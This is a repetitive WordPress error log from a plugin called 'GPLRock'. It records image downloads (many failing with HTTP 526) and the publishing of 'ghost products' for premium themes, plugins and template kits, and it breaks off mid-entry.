GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/silver-care---medical-wordpress-theme-23367.webp for product silver-care-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:21 UTC] GPLRock: Image download failed for product silver-care-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:23 UTC] GPLRock: Image download failed for product silver-care-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/silver-care---medical-wordpress-theme-23367.webp for product silver-care-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:25 UTC] GPLRock WARNING: Image download failed for product silver-care-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/silver-care---medical-wordpress-theme-23367.webp [05-Apr-2026 16:19:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: silver-care-medical-wordpress-theme [05-Apr-2026 16:19:25 UTC] GPLRock: Image download failed for product unico-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:27 UTC] GPLRock: Image download failed for product unico-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unico---multipurpose-wordpress-theme-13357.webp for product unico-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:29 UTC] GPLRock: Image download failed for product unico-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:31 UTC] GPLRock: Image download failed for product unico-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unico---multipurpose-wordpress-theme-13357.webp for product unico-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:33 UTC] GPLRock WARNING: Image download failed for product unico-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/unico---multipurpose-wordpress-theme-13357.webp [05-Apr-2026 16:19:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unico-multipurpose-wordpress-theme [05-Apr-2026 16:19:34 UTC] GPLRock: Image download failed for product resellpress-hosting-wordpress-whmcs-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:36 UTC] GPLRock: Image download failed for product resellpress-hosting-wordpress-whmcs-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resellpress---hosting-wordpress--whmcs-theme-20511.webp for product resellpress-hosting-wordpress-whmcs-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:38 UTC] GPLRock: Image download failed for product resellpress-hosting-wordpress-whmcs-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:40 UTC] GPLRock: Image download failed for product resellpress-hosting-wordpress-whmcs-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resellpress---hosting-wordpress--whmcs-theme-20511.webp for product resellpress-hosting-wordpress-whmcs-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:42 UTC] GPLRock WARNING: Image download failed for product resellpress-hosting-wordpress-whmcs-theme. URL: https://meldwp.com/wp-content/uploads/resellpress---hosting-wordpress--whmcs-theme-20511.webp [05-Apr-2026 16:19:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: resellpress-hosting-wordpress-whmcs-theme [05-Apr-2026 16:19:42 UTC] GPLRock: Image download failed for product lenze-portfolio-photography-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:44 UTC] GPLRock: Image download failed for product lenze-portfolio-photography-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lenze---portfolio-photography-html-template-5232.webp for product lenze-portfolio-photography-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:47 UTC] GPLRock: Image download failed for product lenze-portfolio-photography-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:49 UTC] GPLRock: Image download failed for product lenze-portfolio-photography-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lenze---portfolio-photography-html-template-5232.webp for product lenze-portfolio-photography-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:51 UTC] GPLRock WARNING: Image download failed for product lenze-portfolio-photography-html-template. URL: https://meldwp.com/wp-content/uploads/lenze---portfolio-photography-html-template-5232.webp [05-Apr-2026 16:19:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lenze-portfolio-photography-html-template [05-Apr-2026 16:20:21 UTC] GPLRock: Image downloaded successfully for product mythemeshop-sociallyviral-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e6cb6ec9.jpg [05-Apr-2026 16:20:21 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-sociallyviral-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e6cb6ec9.jpg [05-Apr-2026 16:20:21 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-sociallyviral-wordpress-theme [05-Apr-2026 16:20:22 UTC] GPLRock: Image downloaded successfully for product oxygen-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-efed2230.jpg [05-Apr-2026 16:20:22 UTC] GPLRock: Using pre-downloaded image for product oxygen-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-efed2230.jpg [05-Apr-2026 16:20:22 UTC] GPLRock: Ghost product published with image - Product ID: oxygen-woocommerce-wordpress-theme [05-Apr-2026 16:20:24 UTC] GPLRock: Image downloaded successfully for product wpbakery-page-builder-visual-composer-clipboard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7bc518f4.jpg [05-Apr-2026 16:20:24 UTC] GPLRock: Using pre-downloaded image for product wpbakery-page-builder-visual-composer-clipboard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7bc518f4.jpg [05-Apr-2026 16:20:24 UTC] GPLRock: Ghost product published with image - Product ID: wpbakery-page-builder-visual-composer-clipboard [05-Apr-2026 16:20:25 UTC] GPLRock: Image downloaded successfully for product yith-booking-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9eb557e.jpg [05-Apr-2026 16:20:25 UTC] GPLRock: Using pre-downloaded image for product yith-booking-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9eb557e.jpg [05-Apr-2026 16:20:25 UTC] GPLRock: Ghost product published with image - Product ID: yith-booking-for-woocommerce-premium [05-Apr-2026 16:20:27 UTC] GPLRock: Image downloaded successfully for product jetsearch (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4a62ffdb.jpg [05-Apr-2026 16:20:27 UTC] GPLRock: Using pre-downloaded image for product jetsearch: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4a62ffdb.jpg [05-Apr-2026 16:20:27 UTC] GPLRock: Ghost product published with image - Product ID: jetsearch [05-Apr-2026 16:20:29 UTC] GPLRock: Image downloaded successfully for product transport-wp-transportation-logistic-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1bbc3a88.jpg [05-Apr-2026 16:20:29 UTC] GPLRock: Using pre-downloaded image for product transport-wp-transportation-logistic-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1bbc3a88.jpg [05-Apr-2026 16:20:29 UTC] GPLRock: Ghost product published with image - Product ID: transport-wp-transportation-logistic-theme [05-Apr-2026 16:20:30 UTC] GPLRock: Image downloaded successfully for product hbook-hotel-booking-system-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a98ae06e.jpg [05-Apr-2026 16:20:30 UTC] GPLRock: Using pre-downloaded image for product hbook-hotel-booking-system-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a98ae06e.jpg [05-Apr-2026 16:20:30 UTC] GPLRock: Ghost product published with image - Product ID: hbook-hotel-booking-system-wordpress-plugin [05-Apr-2026 16:30:39 UTC] GPLRock: Image downloaded successfully for product jetsloth-gravity-forms-color-picker (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cafae71b.jpg [05-Apr-2026 16:30:39 UTC] GPLRock: Using pre-downloaded image for product jetsloth-gravity-forms-color-picker: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cafae71b.jpg [05-Apr-2026 16:30:39 UTC] GPLRock: Ghost product published with image - Product ID: jetsloth-gravity-forms-color-picker [05-Apr-2026 16:30:41 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-one-click-checkout-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ecae2b9.jpg [05-Apr-2026 16:30:41 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-one-click-checkout-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ecae2b9.jpg [05-Apr-2026 16:30:41 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-one-click-checkout-premium [05-Apr-2026 16:30:42 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-waiting-list-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c44212e5.jpg [05-Apr-2026 16:30:42 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-waiting-list-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c44212e5.jpg [05-Apr-2026 16:30:42 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-waiting-list-premium [05-Apr-2026 16:30:44 UTC] GPLRock: Image downloaded successfully for product mythemeshop-emaxstore-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcc4cef2.jpg [05-Apr-2026 16:30:44 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-emaxstore-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcc4cef2.jpg [05-Apr-2026 16:30:44 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-emaxstore-wordpress-theme [05-Apr-2026 16:30:45 UTC] GPLRock: Image downloaded successfully for product woocommerce-min-max-quantities (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d20e792b.jpg [05-Apr-2026 16:30:46 UTC] GPLRock: Using pre-downloaded image for product woocommerce-min-max-quantities: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d20e792b.jpg [05-Apr-2026 16:30:46 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-min-max-quantities [05-Apr-2026 16:30:47 UTC] GPLRock: Image downloaded successfully for product eventon-event-countdown (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a669dcac.jpg [05-Apr-2026 16:30:47 UTC] GPLRock: Using pre-downloaded image for product eventon-event-countdown: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a669dcac.jpg [05-Apr-2026 16:30:47 UTC] GPLRock: Ghost product published with image - Product ID: eventon-event-countdown [05-Apr-2026 16:30:49 UTC] GPLRock: Image downloaded successfully for product woocommerce-box-office (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5440b1f4.jpg [05-Apr-2026 16:30:49 UTC] GPLRock: Using pre-downloaded image for product woocommerce-box-office: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5440b1f4.jpg [05-Apr-2026 16:30:49 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-box-office [05-Apr-2026 16:40:54 UTC] GPLRock: Image downloaded successfully for product sunlight-charity-and-volunteer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-77881106.jpg [05-Apr-2026 16:40:54 UTC] GPLRock: Using pre-downloaded image for product sunlight-charity-and-volunteer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-77881106.jpg [05-Apr-2026 16:40:54 UTC] GPLRock: Ghost product published with image - Product ID: sunlight-charity-and-volunteer-elementor-template-kit [05-Apr-2026 16:40:56 UTC] GPLRock: Image downloaded successfully for product syramik-ceramic-pottery-store-woocommerce-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ad28bca.png [05-Apr-2026 16:40:57 UTC] GPLRock: Using pre-downloaded image for product syramik-ceramic-pottery-store-woocommerce-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ad28bca.png [05-Apr-2026 16:40:57 UTC] GPLRock: Ghost product published with image - Product ID: syramik-ceramic-pottery-store-woocommerce-elementor-pro-template-kit [05-Apr-2026 16:40:58 UTC] GPLRock: Image downloaded successfully for product upcycle-waste-management-recycling-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-059b4d5d.jpg [05-Apr-2026 16:40:58 UTC] GPLRock: Using pre-downloaded image for product upcycle-waste-management-recycling-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-059b4d5d.jpg [05-Apr-2026 16:40:58 UTC] GPLRock: Ghost product published with image - Product ID: upcycle-waste-management-recycling-elementor-template-kit [05-Apr-2026 16:41:02 UTC] GPLRock: Image downloaded successfully for product teknocraft-dark-theme-technology-blog-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ac17f35.jpg [05-Apr-2026 16:41:02 UTC] GPLRock: Using pre-downloaded image for product teknocraft-dark-theme-technology-blog-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ac17f35.jpg [05-Apr-2026 16:41:02 UTC] GPLRock: Ghost product published with image - Product ID: teknocraft-dark-theme-technology-blog-template-kit [05-Apr-2026 16:41:04 UTC] GPLRock: Image downloaded successfully for product greenway-golf-club-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c84aacf6.jpg [05-Apr-2026 16:41:04 UTC] GPLRock: Using pre-downloaded image for product greenway-golf-club-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c84aacf6.jpg [05-Apr-2026 16:41:04 UTC] GPLRock: Ghost product published with image - Product ID: greenway-golf-club-course-elementor-template-kit [05-Apr-2026 16:41:06 UTC] GPLRock: Image downloaded successfully for product grund-creative-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9c6b185.jpg [05-Apr-2026 16:41:06 UTC] GPLRock: Using pre-downloaded image for product grund-creative-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9c6b185.jpg [05-Apr-2026 16:41:06 UTC] GPLRock: Ghost product published with image - Product ID: grund-creative-digital-agency-elementor-template-kit [05-Apr-2026 16:41:08 UTC] GPLRock: Image downloaded successfully for product hrnest-hr-solutions-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e609d7db.jpg [05-Apr-2026 16:41:08 UTC] GPLRock: Using pre-downloaded image for product hrnest-hr-solutions-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e609d7db.jpg [05-Apr-2026 16:41:08 UTC] GPLRock: Ghost product published with image - Product ID: hrnest-hr-solutions-elementor-template-kit [05-Apr-2026 16:41:09 UTC] GPLRock: Image downloaded successfully for product lakeside-nature-cottage-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-04ee60f6.jpg [05-Apr-2026 16:41:10 UTC] GPLRock: Using pre-downloaded image for product lakeside-nature-cottage-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-04ee60f6.jpg [05-Apr-2026 16:41:10 UTC] GPLRock: Ghost product published with image - Product ID: lakeside-nature-cottage-elementor-template-kit [05-Apr-2026 16:41:11 UTC] GPLRock: Image downloaded successfully for product meetopia-event-conference-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e4ffd63.jpg [05-Apr-2026 16:41:11 UTC] GPLRock: Using pre-downloaded image for product meetopia-event-conference-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e4ffd63.jpg [05-Apr-2026 16:41:11 UTC] GPLRock: Ghost product published with image - Product ID: meetopia-event-conference-elementor-pro-template-kit [05-Apr-2026 16:41:13 UTC] GPLRock: Image downloaded successfully for product nailknot-carpentry-woodworking-service-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4c5ccc2.jpg [05-Apr-2026 16:41:13 UTC] GPLRock: Using pre-downloaded image for product nailknot-carpentry-woodworking-service-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4c5ccc2.jpg [05-Apr-2026 16:41:13 UTC] GPLRock: Ghost product published with image - Product ID: nailknot-carpentry-woodworking-service-elementor-pro-template-kit [05-Apr-2026 16:42:09 UTC] GPLRock: Image download failed for product pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:11 UTC] GPLRock: Image download failed for product pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pablo-guadi---handcrafted-jewelry--online-shop-wordpress-theme-25974.webp for product pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:13 UTC] GPLRock: Image download failed for product pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:15 UTC] GPLRock: Image download failed for product pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pablo-guadi---handcrafted-jewelry--online-shop-wordpress-theme-25974.webp for product pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:17 UTC] GPLRock WARNING: Image download failed for product pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pablo-guadi---handcrafted-jewelry--online-shop-wordpress-theme-25974.webp [05-Apr-2026 16:42:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pablo-guadi-handcrafted-jewelry-online-shop-wordpress-theme [05-Apr-2026 16:42:17 UTC] GPLRock: Image downloaded successfully for product store-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-561a7035.webp [05-Apr-2026 16:42:17 UTC] GPLRock: Using pre-downloaded image for product store-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-561a7035.webp [05-Apr-2026 16:42:17 UTC] GPLRock: Ghost product published with image - Product ID: store-woocommerce-wordpress-theme [05-Apr-2026 16:42:17 UTC] GPLRock: Image download failed for product kiddo-kid-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:19 UTC] GPLRock: Image download failed for product kiddo-kid-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kiddo---kid-fashion-woocommerce-wordpress-theme-14016.webp for product kiddo-kid-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:22 UTC] GPLRock: Image download failed for product kiddo-kid-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:24 UTC] GPLRock: Image download failed for product kiddo-kid-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kiddo---kid-fashion-woocommerce-wordpress-theme-14016.webp for product kiddo-kid-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:26 UTC] GPLRock WARNING: Image download failed for product kiddo-kid-fashion-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kiddo---kid-fashion-woocommerce-wordpress-theme-14016.webp [05-Apr-2026 16:42:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kiddo-kid-fashion-woocommerce-wordpress-theme [05-Apr-2026 16:42:26 UTC] GPLRock: Image download failed for product petro-industrial-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:28 UTC] GPLRock: Image download failed for product petro-industrial-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petro---industrial-company-wordpress-theme-21561.webp for product petro-industrial-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:30 UTC] GPLRock: Image download failed for product petro-industrial-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:33 UTC] GPLRock: Image download failed for product petro-industrial-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petro---industrial-company-wordpress-theme-21561.webp for product petro-industrial-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:35 UTC] GPLRock WARNING: Image download failed for product petro-industrial-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/petro---industrial-company-wordpress-theme-21561.webp [05-Apr-2026 16:42:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: petro-industrial-company-wordpress-theme [05-Apr-2026 16:42:35 UTC] GPLRock: Image download failed for product nadtek-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:37 UTC] GPLRock: Image download failed for product nadtek-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nadtek---it-solutions--technology-wordpress-theme-31675.webp for product nadtek-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:39 UTC] GPLRock: Image download failed for product nadtek-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:41 UTC] GPLRock: Image download failed for product nadtek-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nadtek---it-solutions--technology-wordpress-theme-31675.webp for product nadtek-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:43 UTC] GPLRock WARNING: Image download failed for product nadtek-it-solutions-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nadtek---it-solutions--technology-wordpress-theme-31675.webp [05-Apr-2026 16:42:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nadtek-it-solutions-technology-wordpress-theme [05-Apr-2026 16:42:44 UTC] GPLRock: Image download failed for product evenio-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:46 UTC] GPLRock: Image download failed for product evenio-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evenio---event-conference-wordpress-theme-11737.webp for product evenio-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:48 UTC] GPLRock: Image download failed for product evenio-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:50 UTC] GPLRock: Image download failed for product evenio-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evenio---event-conference-wordpress-theme-11737.webp for product evenio-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:52 UTC] GPLRock WARNING: Image download failed for product evenio-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/evenio---event-conference-wordpress-theme-11737.webp [05-Apr-2026 16:42:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evenio-event-conference-wordpress-theme [05-Apr-2026 16:42:52 UTC] GPLRock: Image download failed for product seven-stylish-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:54 UTC] GPLRock: Image download failed for product seven-stylish-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seven---stylish-wordpress-theme-31953.webp for product seven-stylish-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:42:57 UTC] GPLRock: Image download failed for product seven-stylish-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:42:59 UTC] GPLRock: Image download failed for product seven-stylish-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seven---stylish-wordpress-theme-31953.webp for product seven-stylish-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:43:01 UTC] GPLRock WARNING: Image download failed for product seven-stylish-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/seven---stylish-wordpress-theme-31953.webp [05-Apr-2026 16:43:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seven-stylish-wordpress-theme [05-Apr-2026 16:43:01 UTC] GPLRock: Image download failed for product naturepress-ecology-environment-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:03 UTC] GPLRock: Image download failed for product naturepress-ecology-environment-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/naturepress---ecology--environment-wordpress-theme-17216.webp for product naturepress-ecology-environment-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:43:05 UTC] GPLRock: Image download failed for product naturepress-ecology-environment-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:08 UTC] GPLRock: Image download failed for product naturepress-ecology-environment-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/naturepress---ecology--environment-wordpress-theme-17216.webp for product naturepress-ecology-environment-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:43:10 UTC] GPLRock WARNING: Image download failed for product naturepress-ecology-environment-wordpress-theme. URL: 